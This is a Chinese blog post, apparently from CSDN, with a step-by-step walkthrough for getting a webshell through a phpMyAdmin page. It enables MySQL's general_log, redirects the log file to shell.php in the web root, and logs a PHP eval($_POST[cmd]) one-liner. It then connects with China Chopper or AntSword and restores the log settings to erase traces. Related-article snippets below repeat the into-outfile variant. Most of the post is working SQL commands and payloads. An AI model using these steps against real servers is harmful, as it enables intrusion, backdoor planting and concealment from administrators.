phpmyadmin页面getshell(2)

最新推荐文章于 2024-09-11 20:05:26 发布
最新推荐文章于 2024-09-11 20:05:26 发布
阅读量445 收藏 9
点赞数 3
文章标签: adb 网络 安全 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80520893/article/details/137237832
版权

0x02 利用全局日志写shell

1、查看配置

查看mysql的日志状态,默认是关闭的,因为这个日志的量非常大对资源是一个比较大的开销

SHOW VARIABLES LIKE '%general%'

general_log_file为日志保存的位置

2、开启general_log模式

开启general_log 的作用:开启它可以记录用户输入的每条命令,会把其保存在C:\phpStudy\MySQL\data\stu1.log的文件中,其实就是我们常说的日志文件
利用思路:开启general_log之后把general_log_file的值修改为该网站默认路径下的某一个自定义的php文件中,然后通过log日志进行写入一句话木马,然后再进一步利用

这里注意:在修改log路径前,源路径一定要提前记录下来,我们获取shell后还要恢复原来的路径

set global general_log = on;

再查看一下日志已经开启,这时我们就可以通过全局日志写shell进根目录

3、修改日志目录为shell地址

set global general_log_file='C:\\phpStudy\\MySQL\\data\\shell.php

4、写入shell

因为开启了日志记录功能,所执行的sql语句都会被记录在日志中

select '<?php eval($_POST[cmd]);?>'

查看下日志,发现sql语句已经被记录到了日志中,直接用菜刀或者蚁剑连接即可

5、抹除痕迹

set global general_log_file='C:\\phpStudy\\MySQL\\data\\stu1.log';
set global general_log = off;

再使用日志查看命令发现已经恢复

SHOW VARIABLES LIKE '%general%'

网安星星
关注
phpMyadmin getshell思路
千寻的博客
03-07 634
文章目录一.phpMyadmin简介二.phpMyadmin getshell思路1.流程简述2.信息收集3.获取网站真实路径的作用一免责声明 一.phpMyadmin简介 phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其...
【渗透测试】--- 利用phpmyadmin来getshell
qq_43168364的博客
12-24 677
利用phpmyadmin来getshell有两种方式 1、利用into outfile直接将一句话入文件中 2、利用Mysql的日志文件getshell 不论是那种方式都要满足以下三个条件: 未限制文件路径 secure_file_priv= 当前用户有文件权限 知道网站根目录 — C:\phpStudy\PHPTutorial\WWW 第一种方法 select "<?php phpinfo();?>" into outfile "/var/www/html/tes
phpmyadmin后台getshell
2301_78533452的博客
09-11 421
查询一句话木马 select "<?上传木马 set global general_log='on';打开phpmyadmin,打开SQL输入界面。打开she.php发现里面出现一句话木马。在浏览器访问she.php文件。右键就可以get shell了。连接密码为一句话木马中的。成功访问,用蚁剑连接。
phpmyadmin getshell
YouthBelief的博客
11-11 5189
phpmyadmin getshell前言一、into outfile马条件利用方法操作二、开启日志马getshell条件利用方法操作三、慢查询webshell利用方法操作四、创建数据库和表入webshell条件利用方法特殊版本getshell 前言 phpMyadmin是一个以PHP为基础的MySQL数据库管理工具,使网站管理员可通过Web接口管理数据库。 虽然网上有很多公开的文章,也用过很多次了,但自己再总结一遍方便自己查阅。 一、into outfile马 条件 1.对web目录需要有权限能
PHPmyadmin Getshell
Grey的博客
07-21 6924
1. phpMyAdmin简介 2. phpMyAdmin getshell思路 3. phpMyAdmin 4.8.1 getshell实战 SHOW VARIABLES LIKE ‘%secure_file_priv%”;   查看读文件路径 “secure_file_priv”对应的值不能为null,为null就没办法正常shell 我们首先需要检测的是MyS...
getshellPhpmyadmin日志
MoCoCN的博客
08-30 688
@MoCoCN Phpmyadmin日志getshell 当初接触渗透测试的时候getshell就会个文件上传,后来随着工作学到的知识越来越多,慢慢的getshell的姿势也慢慢的学到了些,这次给大家分享一个很常见也很基础的getshell的方式。如有什么不严谨的地方,还望大佬指点。 1.准备环境 一台装有Phpstudy(mysql>5.0)的服务器 中国蚁剑 2.开启phpstudy 3.访问服务器phpmyadmin页面 4.弱口令root root登录进去,点击SQL,执行sql语句 查
Web渗透测试对靶机注入shellphpMyAdmin
SYJ_361的博客
12-15 3805
在服务器中寻找目标靶机,对靶机进行渗透。这里用到了kali和中国蚁剑对目标进行渗透,用burpsuite对目标登录页面进行暴力破解账号和密码。
[GWCTF 2019]我有一个数据库&&getshell
plant1234的博客
03-24 2869
BUU我有一个数据库&&getsholl 做这题的话目的是为了复现 phpMyadmin(CVE-2018-12613)后台任意文件包含漏洞 这题的话打开看是乱码,但查看响应还是有东西的: 多的不说先信息收集一波,直接扫目录,看页面有没有有用的信息 然后。 日常访问有没有:robots.txt 得到: 在发现有phpinfo.php 访问得到: 得到了后端脚本语言php的一些信息 扫描得到: 扫描发现有:phpmyadmin/ 直接访问得到: 发现没有要登陆省去了很多的步骤 尝试用
PhpMyadmin--getshell
qq_64664156的博客
09-20 708
phpMyAdmin通过MySQL日志文件getshell
利用phpMyAdmin拿webshell
05-01
利用phpMyAdmin拿webshell 利用phpMyAdmin拿webshell
phpmyadmin页面getshell
qq_52469895的博客
04-10 2450
来到phpmyadmin页面后如何getshell呢?下面介绍两种方法 0x01 select into outfile直接入 1、利用条件 对web目录需要有权限能够使用单引号(root) 知道网站绝对路径(phpinfo/php探针/通过报错等) secure_file_priv没有具体值 2、查看secure_file_priv值 show global variables like '%secure%'; 关于secure_file_
phpMyadminshell
wangyanjienice的博客
04-07 948
select into outfile 使用方法 select load_file('C:/phpStudy/MySQL/shell.php') select '<?php eval($_POST[cmd]); ?>' into outfile 'C:/phpStudy/MySQL/shell.php'; 1.查看绝对目录 select @@basedir; 2.查看入权限 SHOW VARIABLES LIKE "secure_file_priv"; NULL表示禁止,无法
phpMyAdmin 4.0.10 文件包含 -> getshell
2301_80115097的博客
06-25 929
gettype() 获取参数的属性也就是说我们的$var需要是一个数组这里的返回值就是True了还是刚刚说的那些,这里如果是Linux服务器的话,并且sql文件储存路径有大小的话,就没办法拿到webshell了,并且还不能任意文件包含,还只能包含路径没有大字符的,反正至少以我目前的水平是不行的,不过 linux 默认mysql文件的路径是 /var/lib/mysql/。默认情况下是无影响的。
【getshellphpmyadmin后台getshell(4.8.5)
最新发布
m0_71944965的博客
09-11 822
访问一下 最后getshell
phpMyAdmin getshell总结
zzgslh的博客
04-14 774
phpMyAdmin getshell总结 phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。 一、phpMyAdmin权限(into outfile)getshell 利用条件 1.知道网站绝对路径 2.对web目录具有入权限 3.secure_ file_ priv没有具体值 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值